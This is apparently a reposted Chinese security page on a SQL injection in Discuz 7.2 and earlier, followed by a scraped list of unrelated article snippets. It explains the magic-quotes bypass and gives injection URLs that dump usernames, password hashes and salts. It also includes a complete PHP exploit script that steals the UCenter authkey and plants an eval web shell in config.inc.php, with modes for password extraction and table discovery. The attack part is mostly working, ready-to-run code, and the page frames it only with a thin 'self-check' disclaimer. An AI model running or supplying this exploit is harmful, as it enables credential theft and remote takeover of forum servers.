Discuz <= 7.2 SQL注入漏洞详情

在《高级PHP应用程序漏洞审核技术》[1]一文里的"魔术引号带来的新的安全问题"一节里,有

提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题在这里又一次完美体

现,如下面的代码片段:

 

// foo.php?xigr='ryat

function daddslashes($string, $force = 0) {

!defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());

if(!MAGIC_QUOTES_GPC || $force) {

if(is_array($string)) {

foreach($string as $key => $val) {

$string[$key] = daddslashes($val, $force);

}

} else {

$string = addslashes($string);

}

}

return $string;

}

...

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {

foreach($$_request as $_key => $_value) {

$_key{0} != '_' && $$_key = daddslashes($_value);

}

}

 

echo $xigr['hi'];

// echo \

 

上面的代码原本期望得到一个经过daddslashes()安全处理后的数组变量$xigr['hi'],但是没

有对变量$xigr做严格的类型规定,当我们提交一个字符串变量$xigr='ryat,经过上面的处理

变为\'ryat,到最后$xigr['hi']就会输出\,如果这个变量引入到SQL语句,那么就会引起严重

的安全问题了,再来看下面的代码片段:

 

...

if($xigr) {

foreach($xigr as $k => $v) {

$uids[] = $v['uid'];

}

$query = $db->query("SELECT uid FROM users WHERE uid IN ('".implode("','", $uids)."')");

 

利用上面提到的思路,通过提交foo.php?xigr[]='&xigr[][uid]=evilcode这样的构造形式可

以很容易的突破GPC或类似的安全处理,形成SQL注射漏洞:D
http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

爆出账号+密码+salt的语句

http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

以下内容仅供站长进行安全自检,非法利用责任自负

附上getshell exp:(根据别人的测试,代码可能有些部分有待完善)

<?php

 

/**

* @author: xiaoma

* @blog  : www.i0day.com

* @date  : 2014.7.2 23:1

*/

 

error_reporting(0);

set_time_limit(3000);

$host=$argv[1];

$path=$argv[2];

$js=$argv[3];

$timestamp = time()+10*3600;

$table="cdb_";//表名

 

if ($argc < 2) {

print_r('

********************************************************

*  Discuz faq.php SQL Injection Exp                    *

*  ---------By:Www.i0day.com-----------               *

*     Usage: php '.$argv[0].' url [js]                    *

*  -------------------------------------               *

*  js选项: 1.GetShell 2.取密码 3.查表前缀              *

*                                                      *

*   php '.$argv[0].' Www.i0day.com / 1                    *

*   php '.$argv[0].' Www.i0day.com /dz72/ 1               *

*                                                      *

*                                                      *

********************************************************

');

exit;

}

if($js==1){

$sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20".$table."uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23";

$resp = sendpack($host,$path,$sql);

 

if(strpos($resp,"::")==-1){

echo '表前缀可能不是默认cdb_ 请先查看表前缀!';

}else{

preg_match("/::(.*)::/",$resp,$matches);

$lenght=intval($matches[1]);

if($lenght){

if($lenght<=124){

$sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";

$resp = sendpack($host,$path,$sql);

if(strpos($resp,"1\^")!=-1){

preg_match("/1\^(.*)\'/U",$resp,$key1);

$sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";

$resp = sendpack($host,$path,$sql);

preg_match("/1\^(.*)\'/U",$resp,$key2);

$key=$key1[1].$key2[1];

$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $key));

$cmd1='<?xml version="1.0" encoding="ISO-8859-1"?>

<root>

<item id="UC_API">bbs.49you.com\');eval($_POST[i0day]);//</item>

</root>';

$cmd2='<?xml version="1.0" encoding="ISO-8859-1"?>

<root>

<item id="UC_API">bbs.49you.com</item>

</root>';

$html1 = send($cmd1);

$res1=substr($html1,-1);

$html2 = send($cmd2);

$res2=substr($html1,-1);

if($res1=='1'&&$res2=='1'){

echo "shell地址:http://".$host.$path.'config.inc.php   pass:i0day';

}

}else{

echo '获取失败';

}

}

}

}

 

}elseif($js==2){

$sql="action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20".$table."uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23";

$resp = sendpack($host,$path,$sql);

if(strpos($resp,"\^\^\^")!=-1){

preg_match("/\^\^\^(.*)\^/U",$resp,$password);

echo '密码:'.$password[1];

}else{

echo '表前缀可能不是默认cdb_ 请先查看表前缀!';

}

}elseif($js==3){

$sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23";

$resp = sendpack($host,$path,$sql);

if(strpos($resp,"1\^")!=-1){

preg_match("/1\^(.*)\^/U",$resp,$t);

 

if(strpos($t[1],"cdb_")!=-1){

echo "表名为:".hex2str($t[1])." 表前缀为默认cdb_ 无需修改";

}else{

echo "表名:".hex2str($t[1]).' 不是默认表名cdb_请自行修改代码中的$table';

}

}else{

echo "查看表前缀失败,Sorry";

}

}else{

echo "未选择脚本功能";

}

 

 

function sendpack($host,$path,$sql,$js){

$data = "GET ".$path."/faq.php?".$sql." HTTP/1.1\r\n";

$data.="Host:".$host."\r\n";

$data.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n";

$data.="Connection: close\r\n\r\n";

//$data.=$html."\r\n";

$ock=fsockopen($host,80);

 

if(!$ock){

echo "No response from ".$host;

die();

 

}

fwrite($ock,$data);

 

$resp = '';

 

while (!feof($ock)) {

 

$resp.=fread($ock, 1024);

}

 

return $resp;

 

}

function send($cmd){

global $host,$code,$path;

$message = "POST ".$path."/api/uc.php?code=".$code."  HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: ".$host."\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: ".$host."\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

 

//var_dump($message);

$fp = fsockopen($host, 80);

fputs($fp, $message);

 

$resp = '';

 

while ($fp && !feof($fp))

$resp .= fread($fp, 1024);

 

return $resp;

}

 

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

$ckey_length = 4;

 

$key = md5($key ? $key : UC_KEY);

$keya = md5(substr($key, 0, 16));

$keyb = md5(substr($key, 16, 16));

$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

 

$cryptkey = $keya.md5($keya.$keyc);

$key_length = strlen($cryptkey);

 

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;

$string_length = strlen($string);

 

$result = '';

$box = range(0, 255);

 

$rndkey = array();

for($i = 0; $i <= 255; $i++) {

$rndkey[$i] = ord($cryptkey[$i % $key_length]);

}

 

for($j = $i = 0; $i < 256; $i++) {

$j = ($j + $box[$i] + $rndkey[$i]) % 256;

$tmp = $box[$i];

$box[$i] = $box[$j];

$box[$j] = $tmp;

}

 

for($a = $j = $i = 0; $i < $string_length; $i++) {

$a = ($a + 1) % 256;

$j = ($j + $box[$a]) % 256;

$tmp = $box[$a];

$box[$a] = $box[$j];

$box[$j] = $tmp;

$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));

}

 

if($operation == 'DECODE') {

if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {

return substr($result, 26);

} else {

return '';

}

} else {

return $keyc.str_replace('=', '', base64_encode($result));

}

 

}

function hex2str($hex){

$str = '';

$arr = str_split($hex, 2);

foreach($arr as $bit){

$str .= chr(hexdec($bit));

}

return $str;

}

?>

原文链接: http://0day5.com/archives/1834

你可能感兴趣的:(discuz)

  • discuz discuz_admincp.php 讲解,Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729) weixin_39740419 discuz讲解
    0x00漏洞简述漏洞信息8月27号有人在GitHub上公布了有关Discuz1.5-2.5版本中后台数据库备份功能存在的命令执行漏洞的细节。漏洞影响版本Discuz!1.5-2.50x01漏洞复现官方论坛下载相应版本就好。0x02漏洞分析需要注意的是这个漏洞其实是需要登录后台的,并且能有数据库备份权限,所以比较鸡肋。我这边是用Discuz!2.5完成漏洞复现的,并用此进行漏洞分析的。漏洞点在:so
  • CVE-2020-24186 WordPress评论插件wpDiscuz任意文件上传漏洞 sukusec
    0x00漏洞介绍Wordfence的威胁情报团队在一款名叫wpDiscuz的Wordpress评论插件(wpDiscuz是WordPress功能丰富的评论系统插件,可充实网站评论部分)中发现了一个高危漏洞,此漏洞将允许未经认证的攻击者在目标站点中上传任意文件,从而实现远程代码执行。0x01漏洞环境WordPress的gVectorswpDiscuz插件7.0至7.0.4版本中存在远程代码执行漏洞,
  • DZ主题模板 Discuz迪恩淘宝客购物风格商业版模板 818源码资源站 源码下载00818.cn源码下载818资源站php前端
    Discuz淘宝客网站模板,迪恩淘宝客购物风格商业版模板。版本支持:discuzx3.0版本,discuzx3.1版本,discuzx3.2版本。包括网站首页,论坛首页,论坛列表页,论坛内容页,论坛瀑布流,频道列表页,频道内容页(支持多个)。模板论坛首页,列表页,内容页,以及文章页面数据采用DIY数据读取,方便新手老手运营以及后期维护,时尚大气简洁。模板添加了不少处动画效果,增加用户体验和粘度。模
  • 安装笔记:docker安装discuz 孙承云 linuxdockerdocker数据库mysql
    docker安装discuz查询discuz镜像版本,选第一个dockersearchdiscuz下载镜像dockerpulldocker.io/tencentci/discuz启动discuz镜像,名称:BCB_BBS,外部8000端口映射到内部80端口dockerrun--nameBCB_BBS-d-p8000:80tencentci/discuz访问主机地址8000端口,出现下面画面:htt
  • discuzQ后台 配置腾讯云API的时候提示错误 技术服务团队 linux运维服务器bug
    cURLerror56:OpenSSLSSL_read:Connectionresetbypeer,errno104discuzQ后台配置腾讯云API的时候提示错误解决方法
  • 开始从 discuzX3.4 迁移到 nodebb(二)
    (续)3、连接mysql,mongodb传导数据**用户数据字段对照表:**nodebb例子数据//作用说明discuzX字段discuzX表名OK"_id"ObjectId("65cb8801e09f69ff71141520"),[x]"_key"user:2//2通常等于uid"joindate"1707837441083,regdatepre2_common_member[x]"laston
  • 开始从 discuzX3.4 迁移到 nodebb(零) discuz论坛
    论坛这事儿论坛这东西现在已经变得非常的小众,我玩论坛始于25年前(暴露了年龄哈哈),现在逛论坛的时间并不多了,最多看看知乎或者公众号文章,也会偶尔跟着潮流制作一些视频。慢慢发现,好的内容还是很受大家欢迎,一个好的视频内容(不是只流量大的)其实也要有好的文案。本人写东西也只是才是这几年的事,偶尔在实体杂志上写一小方块东西。码字是很花时间的,但也是对自己知识和智慧的集中考验。论坛相对于公众号文章和即时
  • 开始从 discuzX3.4 迁移到 nodebb(二)
    (续)3、连接mysql,mongodb传导数据**用户数据字段对照表:**nodebb例子数据//作用说明discuzX字段discuzX表名OK"_id"ObjectId("65cb8801e09f69ff71141520"),[x]"_key"user:2//2通常等于uid"joindate"1707837441083,regdatepre2_common_member[x]"laston
  • 开始从 discuzX3.4 迁移到 nodebb(一)
    首先要了解下discuzX3.4和nodebb的数据库结构,discuzX用的是mysql,nodebb用的是mongodb。最重要的当然是用户相关的数据表和帖子数据表。discuzX能查到数据表字典,nodebb只能自己用mongodb的admin工具看了。一、用户数据1、nodebb和discuz数据表的对照Nodebb用户表须用的数据(字段):db.objects.findOne({user
  • [转]用python爬虫抓站的一些技巧总结 juunnry pythonwebcrawler
    来源网站:http://www.pythonclub.org/python-network-application/observer-spider学用python也有3个多月了,用得最多的还是各类爬虫脚本:写过抓代理本机验证的脚本,写过在discuz论坛中自动登录自动发贴的脚本,写过自动收邮件的脚本,写过简单的验证码识别的脚本,本来想写googlemusic的抓取脚本的,结果有了强大的gmbox,
  • 如何在Win系统部署Wnmp服务实现远程访问内网本地服务 秋说 内网穿透内网穿透winwnmp
    文章目录前言1.Wnmp下载安装2.Wnmp设置3.安装cpolar内网穿透3.1注册账号3.2下载cpolar客户端3.3登录cpolarwebui管理界面3.4创建公网地址4.固定公网地址访问前言WNMP是Windows系统下的绿色Nginx+Mysql+PHP环境集成套件包,安装完成后即可得到一个Nginx+MySQL+PHP环境,常用来搭建动态网站或者服务器。可直接安装Discuz!,PH
  • c语言程序ising算法,算法及编程语言 - 声振论坛 - 振动,动力学,声学,信号处理,故障诊断 - Powered by Discuz!... 什么斯坦 c语言程序ising算法
    给一下该书的详细信息吧《运筹学基础》作者:张莹出版社:清华大学出版社出版日期:版次:ISBN:730201669页数:311开本:16开包装:平装原价:¥24.0本书包括运筹学中最基本、应用最广泛的七个部分:线性规划、整数规划、目标规划、非线性规划、动态规划、图与网络分析、决策分析。其中以线性规划、非线性规划为重点。全书七部分共详细介绍了50余种实用算法,配有近百个不同类型、不同解法的例题,还有结
  • CentOs 7 搭建论坛BBS Discuz_X3.2 zwb_jianshu
    由于公司项目需要一个互动平台,可以发起活动,发消息留言,讨论过后发现这竟然是一个论坛的功能。于是就不打算耗费功夫开发相关功能,直接另外搭一套BBS算球。。。一直觉得搭建BBS不是一件难事,目前有很多成熟的产品都支持直接建站,找了一些资料看了后发现还是需要很多知识和架构的,下面是详细的搭建过程重新安装了一台CentOs7虚拟机,安装过程资料很多,大家去搜索下系统配置相关系统版本:CentOS-7-x
  • 老司机用脚本批量巧删恶意文件 4/5$全真龙门 服务器运维
    作者:田逸(formyz)一个NFS服务器,为多个Web项目所共享。这些目录包括PHP程序、图片、HTML页面和用户上传的文档和附件等。因为某些Web框架古老,存在诸如不对上传文件做严格的安全性检查,虽然此NFS服务器位于受保护的内部网络,但任然被别有用心的人上传了大量的恶意文件。强烈要求程序员进行程序(Discuz)更新,答复说更新难度太大,无法在程序上进行处理。从系统管理层面上,临时的措施仅仅
  • 《安富莱嵌入式周报》第231期:2021.09.20--2021.09.26 硬汉嵌入式 嵌入式周报stm32物联网
    往期周报汇总地址:嵌入式周报-uCOS&uCGUI&emWin&embOS&TouchGFX&ThreadX-硬汉嵌入式论坛-PoweredbyDiscuz!http://www.armbbs.cn/forum.php?mod=forumdisplay&fid=12&filter=typeid&typeid=104目录1、elements消息:全球十大电动车制造商,国产宁德时代32.5%市场份额,
  • 43 漏洞发现-WEB应用之漏洞探针类型利用修复 山兔1 小迪安全前端
    目录已知CMS开发框架末知CMS演示案例:开发框架类源码渗透测试报告-资讯-thinkphp开发框架类源码渗透测试-咨讯-spring已知CMS非框架类渗透测试报告-工具脚本-wordpress已知CMS非框架类渗透测试报告-代码审计-qqyewu_php未知CMS非框架类渗透测试报告-人工-你我都爱的wg哦~已知CMS如常见的dedecms.discuz,wordpress等源码结构,它们都有一
  • 推荐一个好看的极简主义博客网站程序-liveblog lytcreatee Liveblogpythondjangomysqlhtml5
    以前呢,一直想搭建一个属于自己的博客系统,喜欢网站的所有的内容,所有的权限都可以归属于自己,不是很喜欢微博这种开放性平台,只想把自己的想法、心情记录在某个安静的角落。后来,尝试过很多的网站程序或者主题,dede,discuz,hadsky,lightsns,emblog等等,发现这些程序或者主题都很有特色,但是一直没有自己想要的那种感觉-只是想要寻找一片干净、整洁的净土,不需要多么的复杂,功能多么
  • Discuz论坛搭建:Linux宝塔面板一键部署,固定地址畅享公网访问 聆风吟_ Cpolar杂谈linux运维网络服务器
    个人主页:聆风吟系列专栏:网络奇遇记、Cpolar杂谈少年有梦不应止于心动,更要付诸行动。文章目录前言一.安装基础环境二.一键部署Discuz三.安装cpolar工具四.配置域名访问Discuz五.固定域名公网地址六.配置Discuz论坛结语前言CrossdayDiscuz!Board(以下简称Discuz!)是一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在
  • 《安富莱嵌入式周报》第331期:单片机实现全功能软件无线电,开源电源EEZ升级主控,ARM 汇编用户指南,UDS统一诊断服务解析,半导体可靠性设计手册 硬汉嵌入式 嵌入式周报单片机开源arm开发
    周报汇总地址:嵌入式周报-uCOS&uCGUI&emWin&embOS&TouchGFX&ThreadX-硬汉嵌入式论坛-PoweredbyDiscuz!目录:1、单片机实现低配版全功能软件无线电,范围0.5-30MHz,支持SSB、AM、FM和CW2、TI整理的ARM汇编用户指南3、ADI差分链路的SPI扩展器LTC4332,支持1200米4、开源串口,SPI,I2C和1-Wire开发工具5、软
  • 腾讯云服务器如何安装Discuz! Q?推荐使用Discuz! Q官方镜像 boke112百科 服务器答疑
    腾讯云已经发布了全新的Discuz!Q,如果你使用的是腾讯云服务器,那么我们完全可以通过重装系统直接选择“Discuz!Q官方镜像”,系统重新安装成功后,Discuz!Q即可快速安装,不再需要自己进行配置。1.打开腾讯云官网并登录进入控制台>>点击“最近访问”栏目中的“云服务器”进入到我们想要更换系统的云服务器>>点击实例右侧的“更多>重装系统”>>在弹出的“重装系统须知”对话框中点击【确定,开始
  • discuz java版_discuz加密解密函数 java版 几乎太累了 discuzjava版
    简介:这是discuz加密解密函数java版的详细页面,介绍了和php,java,php,securitydiscuz加密解密函数java版有关的知识、技巧、经验,和一些php源码等。class='pingjiaF'frameborder='0'src='http://biancheng.dnbcw.info/pingjia.php?id=358618'scrolling='no'>最近做一个项目
  • Discuz!生成微信、QQ、支付宝、头条抖音及百度小程序 WordPress小程序
    大数据时代,个人信息越来越透明,以至于手机APP都能读懂你我的心思,甚至能将信息精准地送达到每一个移动端。APP开发者将其称之为“算法推荐”,商家将其称之为“个性化定制”。有人为推荐机制津津乐道,“原来手机比男朋友更懂我”,听到更多合口味的音乐,看更多爱好的视频;也有人感叹其恐怖,担心陷入算法布局好的陷阱,陷入信息茧房。价值巨大的推荐系统虽然我们开始警惕推荐机制可能带来的危害,但对于企业而言,推荐
  • Discuz 安装全流程 CentOS + Docker + PHP + Nginx + Mariadb 叼辣条闯天涯 杂七杂八docker
    仅供技术研究,并非最简单的Discuz安装方法文章目录1Docker安装2MariaDB安装3PHP安装4Nginx安装5Discuz安装5.1安装文件部署5.2安装5.3GD图像处理软件安装5.4附件上传失败问题5.5域名HTTPSSSL配置系统环境:CentOS8Stream远程SSH工具:FinalShell4.9.4PHP版本:7.2-fpmDiscuz版本:Discuz_X3.4_SC_
  • 使用腾讯云搭建discuz论坛教程(上) 嗡嗡嗡qwq 腾讯云云计算
    搭建一个论坛,聚集大家的问题,反馈,或者相反。一开始我是有些摸不着头脑,去discuz官网找了很多的方法,但是这是不对的,你需要在服务器上面进行搭建,这样关机还能访问,如果你是企业需求,可以注册一个域名,然后进行备案。腾讯云:https://console.cloud.tencent.com/在腾讯云和阿里云的对比下,最后我选择了腾讯云,因为需求不是特别高。需要你去选择操作系统,时间,我这里买的是
  • discuz论坛附件上传限制大小2MB 嗡嗡嗡qwq 腾讯云论文阅读
    我遇到了这个问题,去修改了配置PHP.ini文件没有解决.我把他变成2000M依旧没有用,然后我选择了用户组,附件部分。如图所示:然后这个时候我还是没有好,我同事的却不限制大小了,我去清理缓存,无效,最后我又研究了一下,我不是会员,我是管理员呀,然后修改管理员权限就好了。成果展示:
  • 如何使用宝塔面板搭建Discuz论坛服务并结合内网穿透远程访问 Yawesh cpolar数据库
    文章目录前言1.安装基础环境2.一键部署Discuz3.安装cpolar工具4.配置域名访问Discuz5.固定域名公网地址6.配置Discuz论坛前言CrossdayDiscuz!Board(以下简称Discuz!)是一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的论坛服务。下面我们在Linux上使用宝塔
  • 如何在Windows安装Wnmp服务并实现固定地址远程访问 老秦包你会 其他
    文章目录前言1.Wnmp下载安装2.Wnmp设置3.安装cpolar内网穿透3.1注册账号3.2下载cpolar客户端3.3登录cpolarwebui管理界面3.4创建公网地址4.固定公网地址访问前言WNMP是Windows系统下的绿色Nginx+Mysql+PHP环境集成套件包,安装完成后即可得到一个Nginx+MySQL+PHP环境,常用来搭建动态网站或者服务器。可直接安装Discuz!,PH
  • Discuz! X3.4 正式版 简体中文 酷爱码 phpdiscuz论坛源码php
    建设论坛首选源码模板,一直受到很多人的喜爱,很多论坛都是以这个为模板,进行美化。这个是最新版的。Discuz!X3.4在继承和完善Discuz!X3.3的基础上,针对PHP7进行了优化。对于X3.2用户来说,X3.3已继承了X3.2的补丁修复工作。安全稳定的程序为站长提供更加可靠的保障。简要:平台环境:PHP/Mysql文件大小:11.3MB语言:简体中文编码:utf-8/gbk安装步骤:解压文件
  • PHP架构入门你了解么 八重樱勿忘
    最早接触到PHP是在去年想做个人网站的时候,那时候也接触并搭建了WordPress主题,Discuz论坛,织梦等内容管理系统(CMS,ContentManagementSystem)。而这些框架或者产品都是用PHP做的,从而可以看出PHP在特定领域内还是发挥了大的作用并得到追随。“世界上最好的语言”也被作为一个梗在程序员圈子里传播。对于开发人员来说,语言相比业务而言是次要的(当然,如果你不想做开发
  • 网站换服务器 备案,网站换服务器备案吗 Catsoul喵魂 网站换服务器备案
    网站换服务器备案吗内容精选换一换如果您需要使用创建的云服务器搭建一个对外展示的网站或者Web应用程序,请按以下步骤进行相关的配置操作。建站参考如果您使用的是公共镜像创建的云服务器,那么购买完成后可以参考以下建站指导完成完网站或应用程序的搭建。搭建WordPress博客平台,请参考部署WordPress博客系统搭建Discuz论坛平台,请参考搭建Discuz论坛网站。更使用华为云备案系统时,全国互联
  • 怎么样才能成为专业的程序员? cocos2d-x小菜 编程PHP
      如何要想成为一名专业的程序员?仅仅会写代码是不够的。从团队合作去解决问题到版本控制,你还得具备其他关键技能的工具包。当我们询问相关的专业开发人员,那些必备的关键技能都是什么的时候,下面是我们了解到的情况。   关于如何学习代码,各种声音很多,然后很多人就被误导为成为专业开发人员懂得一门编程语言就够了?!呵呵,就像其他工作一样,光会一个技能那是远远不够的。如果你想要成为
  • java web开发 高并发处理 BreakingBad javaWeb并发开发处理
    java处理高并发高负载类网站中数据库的设计方法(java教程,java处理大量数据,java高负载数据) 一:高并发高负载类网站关注点之数据库 没错,首先是数据库,这是大多数应用所面临的首个SPOF。尤其是Web2.0的应用,数据库的响应是首先要解决的。 一般来说MySQL是最常用的,可能最初是一个mysql主机,当数据增加到100万以上,那么,MySQL的效能急剧下降。常用的优化措施是M-S(
  • mysql批量更新 ekian mysql
    mysql更新优化: 一版的更新的话都是采用update set的方式,但是如果需要批量更新的话,只能for循环的执行更新。或者采用executeBatch的方式,执行更新。无论哪种方式,性能都不见得多好。 三千多条的更新,需要3分多钟。 查询了批量更新的优化,有说replace into的方式,即: replace into tableName(id,status) values
  • 微软BI(3) 18289753290 微软BI SSIS
    1) Q:该列违反了完整性约束错误;已获得 OLE DB 记录。源:“Microsoft SQL Server Native Client 11.0” Hresult: 0x80004005 说明:“不能将值 NULL 插入列 'FZCHID',表 'JRB_EnterpriseCredit.dbo.QYFZCH';列不允许有 Null 值。INSERT 失败。”。 A:一般这类问题的存在是
  • Java中的List g21121 java
            List是一个有序的 collection(也称为序列)。此接口的用户可以对列表中每个元素的插入位置进行精确地控制。用户可以根据元素的整数索引(在列表中的位置)访问元素,并搜索列表中的元素。         与 set 不同,列表通常允许重复
  • 读书笔记 永夜-极光 读书笔记
       1.  K是一家加工厂,需要采购原材料,有A,B,C,D 4家供应商,其中A给出的价格最低,性价比最高,那么假如你是这家企业的采购经理,你会如何决策?          传统决策: A:100%订单  B,C,D:0%     &nbs
  • centos 安装 Codeblocks 随便小屋 codeblocks
    1.安装gcc,需要c和c++两部分,默认安装下,CentOS不安装编译器的,在终端输入以下命令即可yum install gccyum install gcc-c++   2.安装gtk2-devel,因为默认已经安装了正式产品需要的支持库,但是没有安装开发所需要的文档.yum install gtk2* 3. 安装wxGTK    yum search w
  • 23种设计模式的形象比喻 aijuans 设计模式
    1、ABSTRACT FACTORY—追MM少不了请吃饭了,麦当劳的鸡翅和肯德基的鸡翅都是MM爱吃的东西,虽然口味有所不同,但不管你带MM去麦当劳或肯德基,只管向服务员说“来四个鸡翅”就行了。麦当劳和肯德基就是生产鸡翅的Factory   工厂模式:客户类和工厂类分开。消费者任何时候需要某种产品,只需向工厂请求即可。消费者无须修改就可以接纳新产品。缺点是当产品修改时,工厂类也要做相应的修改。如:
  • 开发管理 CheckLists aoyouzi 开发管理 CheckLists
    开发管理 CheckLists(23) -使项目组度过完整的生命周期 开发管理 CheckLists(22) -组织项目资源 开发管理 CheckLists(21) -控制项目的范围开发管理 CheckLists(20) -项目利益相关者责任开发管理 CheckLists(19) -选择合适的团队成员开发管理 CheckLists(18) -敏捷开发 Scrum Master 工作开发管理 C
  • js实现切换 百合不是茶 JavaScript栏目切换
    js主要功能之一就是实现页面的特效,窗体的切换可以减少页面的大小,被门户网站大量应用思路: 1,先将要显示的设置为display:bisible 否则设为none 2,设置栏目的id ,js获取栏目的id,如果id为Null就设置为显示 3,判断js获取的id名字;再设置是否显示   代码实现:   html代码: <di
  • 周鸿祎在360新员工入职培训上的讲话 bijian1013 感悟项目管理人生职场
            这篇文章也是最近偶尔看到的,考虑到原博客发布者可能将其删除等原因,也更方便个人查找,特将原文拷贝再发布的。“学东西是为自己的,不要整天以混的姿态来跟公司博弈,就算是混,我觉得你要是能在混的时间里,收获一些别的有利于人生发展的东西,也是不错的,看你怎么把握了”,看了之后,对这句话记忆犹新。  &
  • 前端Web开发的页面效果 Bill_chen htmlWebMicrosoft
    1.IE6下png图片的透明显示: <img src="图片地址" border="0" style="Filter.Alpha(Opacity)=数值(100),style=数值(3)"/> 或在<head></head>间加一段JS代码让透明png图片正常显示。 2.<li>标
  • 【JVM五】老年代垃圾回收:并发标记清理GC(CMS GC) bit1129 垃圾回收
      CMS概述 并发标记清理垃圾回收(Concurrent Mark and Sweep GC)算法的主要目标是在GC过程中,减少暂停用户线程的次数以及在不得不暂停用户线程的请夸功能,尽可能短的暂停用户线程的时间。这对于交互式应用,比如web应用来说,是非常重要的。   CMS垃圾回收针对新生代和老年代采用不同的策略。相比同吞吐量垃圾回收,它要复杂的多。吞吐量垃圾回收在执
  • Struts2技术总结 白糖_ struts2
      必备jar文件 早在struts2.0.*的时候,struts2的必备jar包需要如下几个: commons-logging-*.jar   Apache旗下commons项目的log日志包 freemarker-*.jar          
  • Jquery easyui layout应用注意事项 bozch jquery浏览器easyuilayout
    在jquery easyui中提供了easyui-layout布局,他的布局比较局限,类似java中GUI的border布局。下面对其使用注意事项作简要介绍:      如果在现有的工程中前台界面均应用了jquery easyui,那么在布局的时候最好应用jquery eaysui的layout布局,否则在表单页面(编辑、查看、添加等等)在不同的浏览器会出
  • java-拷贝特殊链表:有一个特殊的链表,其中每个节点不但有指向下一个节点的指针pNext,还有一个指向链表中任意节点的指针pRand,如何拷贝这个特殊链表? bylijinnan java
    public class CopySpecialLinkedList { /** * 题目:有一个特殊的链表,其中每个节点不但有指向下一个节点的指针pNext,还有一个指向链表中任意节点的指针pRand,如何拷贝这个特殊链表? 拷贝pNext指针非常容易,所以题目的难点是如何拷贝pRand指针。 假设原来链表为A1 -> A2 ->... -> An,新拷贝
  • color Chen.H JavaScripthtmlcss
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"  "http://www.w3.org/TR/html4/loose.dtd">    <HTML>    <HEAD>&nbs
  • [信息与战争]移动通讯与网络 comsci 网络
          两个坚持:手机的电池必须可以取下来                光纤不能够入户,只能够到楼宇       建议大家找这本书看看:<&
  • oracle flashback query(闪回查询) daizj oracleflashback queryflashback table
    在Oracle 10g中,Flash back家族分为以下成员: Flashback Database Flashback Drop Flashback Table Flashback Query(分Flashback Query,Flashback Version Query,Flashback Transaction Query) 下面介绍一下Flashback Drop 和Flas
  • zeus持久层DAO单元测试 deng520159 单元测试
    zeus代码测试正紧张进行中,但由于工作比较忙,但速度比较慢.现在已经完成读写分离单元测试了,现在把几种情况单元测试的例子发出来,希望有人能进出意见,让它走下去. 本文是zeus的dao单元测试: 1.单元测试直接上代码   package com.dengliang.zeus.webdemo.test; import org.junit.Test; import o
  • C语言学习三printf函数和scanf函数学习 dcj3sjt126com cprintfscanflanguage
    printf函数 /* 2013年3月10日20:42:32 地点:北京潘家园 功能: 目的: 测试%x %X %#x %#X的用法 */ # include <stdio.h> int main(void) { printf("哈哈!\n"); // \n表示换行 int i = 10; printf
  • 那你为什么小时候不好好读书? dcj3sjt126com life
